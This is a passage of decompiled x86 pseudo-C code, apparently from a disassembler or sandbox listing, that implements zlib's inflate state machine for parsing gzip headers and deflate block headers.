                                                                                                                                                                                        											__eflags = __eax;
                                                                                                                                                                                        											if(__eax != 0) {
                                                                                                                                                                                        												 *(__eax + 0x14) = __edx;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                                                        											if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                                                        												 *(__ebp - 0x14) = __dl;
                                                                                                                                                                                        												__eax = __ebp - 0x14;
                                                                                                                                                                                        												__eflags = __edx;
                                                                                                                                                                                        												 *(__ebp - 0x13) = __dl;
                                                                                                                                                                                        												 *(__ebx + 0x18) = E013230C1( *(__ebx + 0x18), __ebp - 0x14, 2);
                                                                                                                                                                                        											}
                                                                                                                                                                                        											__eax = 0;
                                                                                                                                                                                        											__edi = 0;
                                                                                                                                                                                        											 *(__ebp - 0xc) = 0;
                                                                                                                                                                                        											 *(__ebp - 0x10) = 0;
                                                                                                                                                                                        											goto L69;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L59:
                                                                                                                                                                                        										_t118 = __ebp - 8; // 0x38
                                                                                                                                                                                        										__eax =  *_t118;
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											L60:
                                                                                                                                                                                        											__eflags = __ecx;
                                                                                                                                                                                        											if(__ecx == 0) {
                                                                                                                                                                                        												goto L322;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L61:
                                                                                                                                                                                        											__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        											 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        											__ecx = __edi;
                                                                                                                                                                                        											__eax = __eax << __cl;
                                                                                                                                                                                        											__edi = __edi + 8;
                                                                                                                                                                                        											__ecx =  *(__ebp - 4);
                                                                                                                                                                                        											__edx = __eax + __edx;
                                                                                                                                                                                        											_t121 = __ebp - 8; // 0x38
                                                                                                                                                                                        											__eax =  *_t121;
                                                                                                                                                                                        											__eax =  *_t121 + 1;
                                                                                                                                                                                        											 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        											 *(__ebp - 8) = __eax;
                                                                                                                                                                                        											__eflags = __edi - 0x10;
                                                                                                                                                                                        											if(__edi < 0x10) {
                                                                                                                                                                                        												continue;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L62;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L322;
                                                                                                                                                                                        									case 5:
                                                                                                                                                                                        										L70:
                                                                                                                                                                                        										__eflags =  *(__ebx + 0x10) & 0x00000400;
                                                                                                                                                                                        										if(( *(__ebx + 0x10) & 0x00000400) == 0) {
                                                                                                                                                                                        											L83:
                                                                                                                                                                                        											__edx = 0;
                                                                                                                                                                                        											__eflags = 0;
                                                                                                                                                                                        											L84:
                                                                                                                                                                                        											__ecx =  *(__ebp - 4);
                                                                                                                                                                                        											 *(__ebx + 0x40) = __edx;
                                                                                                                                                                                        											 *__ebx = 6;
                                                                                                                                                                                        											goto L86;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L71:
                                                                                                                                                                                        										__ecx =  *(__ebx + 0x40);
                                                                                                                                                                                        										__edx =  *(__ebp - 4);
                                                                                                                                                                                        										__eflags = __ecx - __edx;
                                                                                                                                                                                        										__ecx =  >  ? __edx : __ecx;
                                                                                                                                                                                        										 *(__ebp - 0x30) = __ecx;
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx != 0) {
                                                                                                                                                                                        											__edx =  *(__ebx + 0x20);
                                                                                                                                                                                        											__eflags = __edx;
                                                                                                                                                                                        											if(__edx != 0) {
                                                                                                                                                                                        												__eax =  *(__edx + 0x10);
                                                                                                                                                                                        												 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                        												__eflags = __eax;
                                                                                                                                                                                        												if(__eax != 0) {
                                                                                                                                                                                        													__eax =  *(__edx + 0x14);
                                                                                                                                                                                        													__eax =  *(__edx + 0x14) -  *(__ebx + 0x40);
                                                                                                                                                                                        													__edx =  *(__edx + 0x18);
                                                                                                                                                                                        													 *(__ebp - 0x34) = __eax;
                                                                                                                                                                                        													__eflags = __eax - __edx;
                                                                                                                                                                                        													__eax =  *(__ebp - 0x34);
                                                                                                                                                                                        													if(__eflags <= 0) {
                                                                                                                                                                                        														__edx = __ecx;
                                                                                                                                                                                        													} else {
                                                                                                                                                                                        														__edx = __edx - __eax;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													_t154 = __ebp - 8; // 0x38
                                                                                                                                                                                        													__ecx =  *_t154;
                                                                                                                                                                                        													__eax = __eax +  *(__ebp - 0x2c);
                                                                                                                                                                                        													__eflags = __eax;
                                                                                                                                                                                        													__eax = memcpy(__eax,  *_t154, __edx);
                                                                                                                                                                                        													__ecx =  *(__ebp - 0x30);
                                                                                                                                                                                        													__esp = __esp + 0xc;
                                                                                                                                                                                        												}
                                                                                                                                                                                        											}
                                                                                                                                                                                        											__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                                                        											if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                                                        												_t160 = __ebp - 8; // 0x38
                                                                                                                                                                                        												 *(__ebx + 0x18) = E013230C1( *(__ebx + 0x18),  *_t160, __ecx);
                                                                                                                                                                                        											}
                                                                                                                                                                                        											__eax =  *(__ebp - 0x30);
                                                                                                                                                                                        											 *(__ebp - 4) =  *(__ebp - 4) - __eax;
                                                                                                                                                                                        											 *(__ebp - 8) =  *(__ebp - 8) + __eax;
                                                                                                                                                                                        											_t168 = __ebx + 0x40;
                                                                                                                                                                                        											 *_t168 =  *(__ebx + 0x40) - __eax;
                                                                                                                                                                                        											__eflags =  *_t168;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__edx = 0;
                                                                                                                                                                                        										__eflags =  *(__ebx + 0x40);
                                                                                                                                                                                        										if( *(__ebx + 0x40) != 0) {
                                                                                                                                                                                        											goto L322;
                                                                                                                                                                                        										} else {
                                                                                                                                                                                        											L82:
                                                                                                                                                                                        											goto L84;
                                                                                                                                                                                        										}
                                                                                                                                                                                        									case 6:
                                                                                                                                                                                        										L85:
                                                                                                                                                                                        										__edx = 0;
                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                        										L86:
                                                                                                                                                                                        										__eflags =  *(__ebx + 0x10) & 0x00000800;
                                                                                                                                                                                        										if(( *(__ebx + 0x10) & 0x00000800) == 0) {
                                                                                                                                                                                        											L100:
                                                                                                                                                                                        											__eax =  *(__ebx + 0x20);
                                                                                                                                                                                        											__eflags = __eax;
                                                                                                                                                                                        											if(__eax != 0) {
                                                                                                                                                                                        												 *(__eax + 0x1c) = __edx;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L102:
                                                                                                                                                                                        											__edx = 0;
                                                                                                                                                                                        											 *__ebx = 7;
                                                                                                                                                                                        											 *(__ebx + 0x40) = 0;
                                                                                                                                                                                        											goto L104;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L87:
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx == 0) {
                                                                                                                                                                                        											goto L322;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L88:
                                                                                                                                                                                        										__esi =  *(__ebp - 4);
                                                                                                                                                                                        										__eax = __edx;
                                                                                                                                                                                        										_t177 = __ebp - 8; // 0x38
                                                                                                                                                                                        										__edx =  *_t177;
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											L89:
                                                                                                                                                                                        											__ecx =  *(__eax + __edx) & 0x000000ff;
                                                                                                                                                                                        											__eax = __eax + 1;
                                                                                                                                                                                        											 *(__ebp - 0x2c) = __ecx;
                                                                                                                                                                                        											__ecx =  *(__ebx + 0x20);
                                                                                                                                                                                        											 *(__ebp - 0x34) = __eax;
                                                                                                                                                                                        											__eflags = __ecx;
                                                                                                                                                                                        											if(__ecx != 0) {
                                                                                                                                                                                        												__edx =  *(0x1c + __ecx);
                                                                                                                                                                                        												__eflags =  *(0x1c + __ecx);
                                                                                                                                                                                        												if( *(0x1c + __ecx) != 0) {
                                                                                                                                                                                        													__edx =  *(__ebx + 0x40);
                                                                                                                                                                                        													__eflags = __edx -  *((intOrPtr*)(__ecx + 0x20));
                                                                                                                                                                                        													if(__edx <  *((intOrPtr*)(__ecx + 0x20))) {
                                                                                                                                                                                        														__ecx =  *(0x1c + __ecx);
                                                                                                                                                                                        														__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                        														 *(__ecx + __edx) = __al;
                                                                                                                                                                                        														_t188 = __ebx + 0x40;
                                                                                                                                                                                        														 *_t188 =  *(__ebx + 0x40) + 1;
                                                                                                                                                                                        														__eflags =  *_t188;
                                                                                                                                                                                        														__eax =  *(__ebp - 0x34);
                                                                                                                                                                                        													}
                                                                                                                                                                                        												}
                                                                                                                                                                                        												_t191 = __ebp - 8; // 0x38
                                                                                                                                                                                        												__edx =  *_t191;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											__eflags =  *(__ebp - 0x2c);
                                                                                                                                                                                        											if( *(__ebp - 0x2c) == 0) {
                                                                                                                                                                                        												break;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L95:
                                                                                                                                                                                        											__eflags = __eax - __esi;
                                                                                                                                                                                        											if(__eax < __esi) {
                                                                                                                                                                                        												continue;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											break;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L96:
                                                                                                                                                                                        										__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                                                        										_t196 = __ebp + 8; // 0x38
                                                                                                                                                                                        										__esi =  *_t196;
                                                                                                                                                                                        										if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                                                        											 *(__ebx + 0x18) = __eax;
                                                                                                                                                                                        											__eax =  *(__ebp - 0x34);
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__ecx =  *(__ebp - 4);
                                                                                                                                                                                        										 *(__ebp - 8) =  *(__ebp - 8) + __eax;
                                                                                                                                                                                        										__ecx =  *(__ebp - 4) - __eax;
                                                                                                                                                                                        										__eflags =  *(__ebp - 0x2c);
                                                                                                                                                                                        										 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        										if( *(__ebp - 0x2c) != 0) {
                                                                                                                                                                                        											goto L322;
                                                                                                                                                                                        										} else {
                                                                                                                                                                                        											L99:
                                                                                                                                                                                        											goto L102;
                                                                                                                                                                                        										}
                                                                                                                                                                                        									case 7:
                                                                                                                                                                                        										L103:
                                                                                                                                                                                        										__edx = 0;
                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                        										L104:
                                                                                                                                                                                        										__eflags =  *(__ebx + 0x10) & 0x00001000;
                                                                                                                                                                                        										if(( *(__ebx + 0x10) & 0x00001000) == 0) {
                                                                                                                                                                                        											L118:
                                                                                                                                                                                        											__eax =  *(__ebx + 0x20);
                                                                                                                                                                                        											__eflags = __eax;
                                                                                                                                                                                        											if(__eax != 0) {
                                                                                                                                                                                        												 *(__eax + 0x24) = __edx;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L120:
                                                                                                                                                                                        											__edx =  *(__ebp - 0xc);
                                                                                                                                                                                        											 *__ebx = 8;
                                                                                                                                                                                        											goto L121;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L105:
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx == 0) {
                                                                                                                                                                                        											goto L322;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L106:
                                                                                                                                                                                        										__esi =  *(__ebp - 4);
                                                                                                                                                                                        										__eax = __edx;
                                                                                                                                                                                        										_t212 = __ebp - 8; // 0x38
                                                                                                                                                                                        										__edx =  *_t212;
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											L107:
                                                                                                                                                                                        											__ecx =  *(__eax + __edx) & 0x000000ff;
                                                                                                                                                                                        											__eax = __eax + 1;
                                                                                                                                                                                        											 *(__ebp - 0x2c) = __ecx;
                                                                                                                                                                                        											__ecx =  *(__ebx + 0x20);
                                                                                                                                                                                        											 *(__ebp - 0x34) = __eax;
                                                                                                                                                                                        											__eflags = __ecx;
                                                                                                                                                                                        											if(__ecx != 0) {
                                                                                                                                                                                        												__edx =  *(__ecx + 0x24);
                                                                                                                                                                                        												__eflags =  *(__ecx + 0x24);
                                                                                                                                                                                        												if( *(__ecx + 0x24) != 0) {
                                                                                                                                                                                        													__edx =  *(__ebx + 0x40);
                                                                                                                                                                                        													__eflags = __edx -  *((intOrPtr*)(__ecx + 0x28));
                                                                                                                                                                                        													if(__edx <  *((intOrPtr*)(__ecx + 0x28))) {
                                                                                                                                                                                        														__ecx =  *(__ecx + 0x24);
                                                                                                                                                                                        														__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                        														 *(__ecx + __edx) = __al;
                                                                                                                                                                                        														_t223 = __ebx + 0x40;
                                                                                                                                                                                        														 *_t223 =  *(__ebx + 0x40) + 1;
                                                                                                                                                                                        														__eflags =  *_t223;
                                                                                                                                                                                        														__eax =  *(__ebp - 0x34);
                                                                                                                                                                                        													}
                                                                                                                                                                                        												}
                                                                                                                                                                                        												_t226 = __ebp - 8; // 0x38
                                                                                                                                                                                        												__edx =  *_t226;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											__eflags =  *(__ebp - 0x2c);
                                                                                                                                                                                        											if( *(__ebp - 0x2c) == 0) {
                                                                                                                                                                                        												break;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L113:
                                                                                                                                                                                        											__eflags = __eax - __esi;
                                                                                                                                                                                        											if(__eax < __esi) {
                                                                                                                                                                                        												continue;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											break;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L114:
                                                                                                                                                                                        										__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                                                        										_t231 = __ebp + 8; // 0x38
                                                                                                                                                                                        										__esi =  *_t231;
                                                                                                                                                                                        										if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                                                        											 *(__ebx + 0x18) = __eax;
                                                                                                                                                                                        											__eax =  *(__ebp - 0x34);
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__ecx =  *(__ebp - 4);
                                                                                                                                                                                        										 *(__ebp - 8) =  *(__ebp - 8) + __eax;
                                                                                                                                                                                        										__ecx =  *(__ebp - 4) - __eax;
                                                                                                                                                                                        										__eflags =  *(__ebp - 0x2c);
                                                                                                                                                                                        										 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        										if( *(__ebp - 0x2c) != 0) {
                                                                                                                                                                                        											goto L322;
                                                                                                                                                                                        										} else {
                                                                                                                                                                                        											L117:
                                                                                                                                                                                        											goto L120;
                                                                                                                                                                                        										}
                                                                                                                                                                                        									case 8:
                                                                                                                                                                                        										L121:
                                                                                                                                                                                        										__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                                                        										if(( *(__ebx + 0x10) & 0x00000200) == 0) {
                                                                                                                                                                                        											L129:
                                                                                                                                                                                        											__edx = 0;
                                                                                                                                                                                        											__eflags = 0;
                                                                                                                                                                                        											L130:
                                                                                                                                                                                        											__ecx =  *(__ebx + 0x20);
                                                                                                                                                                                        											__eflags = __ecx;
                                                                                                                                                                                        											if(__ecx != 0) {
                                                                                                                                                                                        												 *(__ebx + 0x10) =  *(__ebx + 0x10) >> 9;
                                                                                                                                                                                        												__eax =  *(__ebx + 0x10) >> 0x00000009 & 0x00000001;
                                                                                                                                                                                        												__eflags = __eax;
                                                                                                                                                                                        												 *(__ecx + 0x2c) = __eax;
                                                                                                                                                                                        												__eax =  *(__ebx + 0x20);
                                                                                                                                                                                        												 *( *(__ebx + 0x20) + 0x30) = 1;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											__eax = E013230C1(__edx, __edx, __edx);
                                                                                                                                                                                        											 *(__ebx + 0x18) = __eax;
                                                                                                                                                                                        											 *(__esi + 0x30) = __eax;
                                                                                                                                                                                        											 *__ebx = 0xb;
                                                                                                                                                                                        											goto L133;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L122:
                                                                                                                                                                                        										_push(0x10);
                                                                                                                                                                                        										_pop(__eax);
                                                                                                                                                                                        										__eflags = __edi - __eax;
                                                                                                                                                                                        										if(__edi >= __eax) {
                                                                                                                                                                                        											L126:
                                                                                                                                                                                        											__eax =  *(__ebx + 0x18) & 0x0000ffff;
                                                                                                                                                                                        											__eflags = __edx - ( *(__ebx + 0x18) & 0x0000ffff);
                                                                                                                                                                                        											if(__edx == ( *(__ebx + 0x18) & 0x0000ffff)) {
                                                                                                                                                                                        												L128:
                                                                                                                                                                                        												__edx = 0;
                                                                                                                                                                                        												__edi = 0;
                                                                                                                                                                                        												 *(__ebp - 0xc) = 0;
                                                                                                                                                                                        												 *(__ebp - 0x10) = 0;
                                                                                                                                                                                        												goto L130;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L127:
                                                                                                                                                                                        											 *(__esi + 0x18) = "header crc mismatch";
                                                                                                                                                                                        											goto L17;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L123:
                                                                                                                                                                                        										_t246 = __ebp - 8; // 0x38
                                                                                                                                                                                        										__eax =  *_t246;
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											L124:
                                                                                                                                                                                        											__eflags = __ecx;
                                                                                                                                                                                        											if(__ecx == 0) {
                                                                                                                                                                                        												goto L322;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L125:
                                                                                                                                                                                        											__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        											 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        											__ecx = __edi;
                                                                                                                                                                                        											__eax = __eax << __cl;
                                                                                                                                                                                        											__edi = __edi + 8;
                                                                                                                                                                                        											__ecx =  *(__ebp - 4);
                                                                                                                                                                                        											__edx = __eax + __edx;
                                                                                                                                                                                        											_t249 = __ebp - 8; // 0x38
                                                                                                                                                                                        											__eax =  *_t249;
                                                                                                                                                                                        											__eax =  *_t249 + 1;
                                                                                                                                                                                        											 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        											 *(__ebp - 8) = __eax;
                                                                                                                                                                                        											 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        											__eflags = __edi - 0x10;
                                                                                                                                                                                        											if(__edi < 0x10) {
                                                                                                                                                                                        												continue;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L126;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L322;
                                                                                                                                                                                        									case 9:
                                                                                                                                                                                        										L139:
                                                                                                                                                                                        										__eflags = __edi - 0x20;
                                                                                                                                                                                        										if(__edi >= 0x20) {
                                                                                                                                                                                        											L143:
                                                                                                                                                                                        											__ecx = __edx;
                                                                                                                                                                                        											__edi = 0xff00;
                                                                                                                                                                                        											__ecx = __edx & 0x0000ff00;
                                                                                                                                                                                        											__edx = __edx << 0x10;
                                                                                                                                                                                        											__ecx = (__edx & 0x0000ff00) + (__edx << 0x10);
                                                                                                                                                                                        											__edx = __edx >> 8;
                                                                                                                                                                                        											__eax = __edx >> 0x00000008 & 0x0000ff00;
                                                                                                                                                                                        											__ecx = (__edx & 0x0000ff00) + (__edx << 0x10) << 8;
                                                                                                                                                                                        											__eax = (__edx >> 0x00000008 & 0x0000ff00) + ((__edx & 0x0000ff00) + (__edx << 0x10) << 8);
                                                                                                                                                                                        											__edx = __edx >> 0x18;
                                                                                                                                                                                        											__ecx =  *(__ebp - 4);
                                                                                                                                                                                        											__eax = __eax + __edx;
                                                                                                                                                                                        											 *(__ebx + 0x18) = __eax;
                                                                                                                                                                                        											 *(__esi + 0x30) = __eax;
                                                                                                                                                                                        											__eax = 0;
                                                                                                                                                                                        											__edx = 0;
                                                                                                                                                                                        											 *__ebx = 0xa;
                                                                                                                                                                                        											 *(__ebp - 0xc) = 0;
                                                                                                                                                                                        											__edi = 0;
                                                                                                                                                                                        											goto L145;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L140:
                                                                                                                                                                                        										__eax =  *(__ebp - 8);
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											L141:
                                                                                                                                                                                        											__eflags = __ecx;
                                                                                                                                                                                        											if(__ecx == 0) {
                                                                                                                                                                                        												goto L322;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L142:
                                                                                                                                                                                        											__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        											 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        											__ecx = __edi;
                                                                                                                                                                                        											__eax = __eax << __cl;
                                                                                                                                                                                        											__edi = __edi + 8;
                                                                                                                                                                                        											__ecx =  *(__ebp - 4);
                                                                                                                                                                                        											__edx = __eax + __edx;
                                                                                                                                                                                        											__eax =  *(__ebp - 8);
                                                                                                                                                                                        											__eax =  *(__ebp - 8) + 1;
                                                                                                                                                                                        											 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        											 *(__ebp - 8) = __eax;
                                                                                                                                                                                        											__eflags = __edi - 0x20;
                                                                                                                                                                                        											if(__edi < 0x20) {
                                                                                                                                                                                        												continue;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L143;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L322;
                                                                                                                                                                                        									case 0xa:
                                                                                                                                                                                        										L144:
                                                                                                                                                                                        										__eax = 0;
                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                        										L145:
                                                                                                                                                                                        										__eflags =  *((intOrPtr*)(__ebx + 0xc)) - __eax;
                                                                                                                                                                                        										if( *((intOrPtr*)(__ebx + 0xc)) == __eax) {
                                                                                                                                                                                        											L316:
                                                                                                                                                                                        											__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                        											 *(__esi + 0xc) =  *(__ebp - 0x1c);
                                                                                                                                                                                        											__eax =  *(__ebp - 0x18);
                                                                                                                                                                                        											 *(__esi + 0x10) =  *(__ebp - 0x18);
                                                                                                                                                                                        											__eax =  *(__ebp - 8);
                                                                                                                                                                                        											 *__esi =  *(__ebp - 8);
                                                                                                                                                                                        											 *(__esi + 4) = __ecx;
                                                                                                                                                                                        											 *(__ebx + 0x38) = __edx;
                                                                                                                                                                                        											 *(__ebx + 0x3c) = __edi;
                                                                                                                                                                                        											_push(2);
                                                                                                                                                                                        											goto L137;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L146:
                                                                                                                                                                                        										__eax = E01322E91(__eax, __eax, __eax);
                                                                                                                                                                                        										__edx =  *(__ebp - 0xc);
                                                                                                                                                                                        										__ecx =  *(__ebp - 4);
                                                                                                                                                                                        										 *(__ebx + 0x18) = __eax;
                                                                                                                                                                                        										 *(__esi + 0x30) = __eax;
                                                                                                                                                                                        										 *__ebx = 0xb;
                                                                                                                                                                                        										goto L147;
                                                                                                                                                                                        									case 0xb:
                                                                                                                                                                                        										L147:
                                                                                                                                                                                        										__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 5;
                                                                                                                                                                                        										if( *((intOrPtr*)(__ebp + 0xc)) == 5) {
                                                                                                                                                                                        											goto L322;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L148:
                                                                                                                                                                                        										__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 6;
                                                                                                                                                                                        										if( *((intOrPtr*)(__ebp + 0xc)) == 6) {
                                                                                                                                                                                        											goto L322;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L149;
                                                                                                                                                                                        									case 0xc:
                                                                                                                                                                                        										L149:
                                                                                                                                                                                        										__eflags =  *(__ebx + 4);
                                                                                                                                                                                        										if( *(__ebx + 4) == 0) {
                                                                                                                                                                                        											L151:
                                                                                                                                                                                        											__eflags = __edi - 3;
                                                                                                                                                                                        											if(__edi >= 3) {
                                                                                                                                                                                        												L155:
                                                                                                                                                                                        												__eax = __edx;
                                                                                                                                                                                        												__edx = __edx >> 1;
                                                                                                                                                                                        												 *(__ebx + 4) = __eax;
                                                                                                                                                                                        												__edx = __edx & 0x00000003;
                                                                                                                                                                                        												__eax = __edx & 0x00000003;
                                                                                                                                                                                        												__eflags = __eax;
                                                                                                                                                                                        												if(__eax == 0) {
                                                                                                                                                                                        													L163:
                                                                                                                                                                                        													 *__ebx = 0xd;
                                                                                                                                                                                        													L164:
                                                                                                                                                                                        													__edx = __edx >> 2;
                                                                                                                                                                                        													__edi = __edi - 3;
                                                                                                                                                                                        													L21:
                                                                                                                                                                                        													 *(_t841 - 0xc) = _t822;
                                                                                                                                                                                        													 *(_t841 - 0x10) = _t833;
                                                                                                                                                                                        													goto L134;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L156:
                                                                                                                                                                                        												__eax = __eax - 1;
                                                                                                                                                                                        												__eflags = __eax;
                                                                                                                                                                                        												if(__eax == 0) {
                                                                                                                                                                                        													L161:
                                                                                                                                                                                        													__eax = E01321718(__ebx);
                                                                                                                                                                                        													 *__ebx = 0x13;
                                                                                                                                                                                        													__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 6;
                                                                                                                                                                                        													if( *((intOrPtr*)(__ebp + 0xc)) != 6) {
                                                                                                                                                                                        														goto L164;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													L162:
                                                                                                                                                                                        													__edx = __edx >> 2;
                                                                                                                                                                                        													__edi = __edi - 3;
                                                                                                                                                                                        													 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        													goto L322;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L157:
                                                                                                                                                                                        												__eax = __eax - 1;
                                                                                                                                                                                        												__eflags = __eax;
                                                                                                                                                                                        												if(__eax == 0) {
                                                                                                                                                                                        													_push(0x10);
                                                                                                                                                                                        													_pop(__eax);
                                                                                                                                                                                        													 *__ebx = __eax;
                                                                                                                                                                                        												} else {
                                                                                                                                                                                        													__eax = __eax - 1;
                                                                                                                                                                                        													__eflags = __eax;
                                                                                                                                                                                        													if(__eax == 0) {
                                                                                                                                                                                        														 *(__esi + 0x18) = "invalid block type";
                                                                                                                                                                                        														 *__ebx = 0x1d;
                                                                                                                                                                                        													}
                                                                                                                                                                                        												}
                                                                                                                                                                                        												goto L164;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L152:
                                                                                                                                                                                        											__eax =  *(__ebp - 8);
                                                                                                                                                                                        											while(1) {
                                                                                                                                                                                        												L153:
                                                                                                                                                                                        												__eflags = __ecx;
                                                                                                                                                                                        												if(__ecx == 0) {
                                                                                                                                                                                        													goto L322;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L154:
                                                                                                                                                                                        												__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        												 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        												__ecx = __edi;
                                                                                                                                                                                        												__eax = __eax << __cl;
                                                                                                                                                                                        												__edi = __edi + 8;
                                                                                                                                                                                        												__ecx =  *(__ebp - 4);
                                                                                                                                                                                        												__edx = __eax + __edx;
                                                                                                                                                                                        												__eax =  *(__ebp - 8);
                                                                                                                                                                                        												__eax =  *(__ebp - 8) + 1;
                                                                                                                                                                                        												 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        												 *(__ebp - 8) = __eax;
                                                                                                                                                                                        												__eflags = __edi - 3;
                                                                                                                                                                                        												if(__edi < 3) {
                                                                                                                                                                                        													continue;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												goto L155;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L322;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L150:
                                                                                                                                                                                        										__ecx = __edi;
                                                                                                                                                                                        										 *__ebx = 0x1a;
                                                                                                                                                                                        										__ecx = __edi & 0x00000007;
                                                                                                                                                                                        										__edx = __edx >> __cl;
                                                                                                                                                                                        										__edi = __edi - __ecx;
                                                                                                                                                                                        										 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        										 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        										goto L134;
                                                                                                                                                                                        									case 0xd:
                                                                                                                                                                                        										goto L0;
                                                                                                                                                                                        									case 0xe:
                                                                                                                                                                                        										goto L171;
                                                                                                                                                                                        									case 0xf:
                                                                                                                                                                                        										goto L172;
                                                                                                                                                                                        									case 0x10:
                                                                                                                                                                                        										L176:
                                                                                                                                                                                        										__eflags = __edi - 0xe;
                                                                                                                                                                                        										if(__edi >= 0xe) {
                                                                                                                                                                                        											L180:
                                                                                                                                                                                        											__eax = __edx;
                                                                                                                                                                                        											__edi = __edi - 0xe;
                                                                                                                                                                                        											__eax = __edx & 0x0000001f;
                                                                                                                                                                                        											__edx = __edx >> 5;
                                                                                                                                                                                        											__eax = __eax + 0x101;
                                                                                                                                                                                        											 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        											 *(__ebx + 0x60) = __eax;
                                                                                                                                                                                        											__eax = __edx;
                                                                                                                                                                                        											__eax = __edx & 0x0000001f;
                                                                                                                                                                                        											__edx = __edx >> 5;
                                                                                                                                                                                        											 *(__ebx + 0x64) = __eax;
                                                                                                                                                                                        											__eax = __edx;
                                                                                                                                                                                        											__eax = __edx & 0x0000000f;
                                                                                                                                                                                        											__edx = __edx >> 4;
                                                                                                                                                                                        											__eax = __eax + 4;
                                                                                                                                                                                        											 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        											__eflags =  *(__ebx + 0x60) - 0x11e;
                                                                                                                                                                                        											 *(__ebx + 0x5c) = __eax;
                                                                                                                                                                                        											if( *(__ebx + 0x60) > 0x11e) {
                                                                                                                                                                                        												L183:
                                                                                                                                                                                        												 *(__esi + 0x18) = "too many length or distance symbols";
                                                                                                                                                                                        												goto L31;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L181:
                                                                                                                                                                                        											__eflags =  *(__ebx + 0x64) - 0x1e;
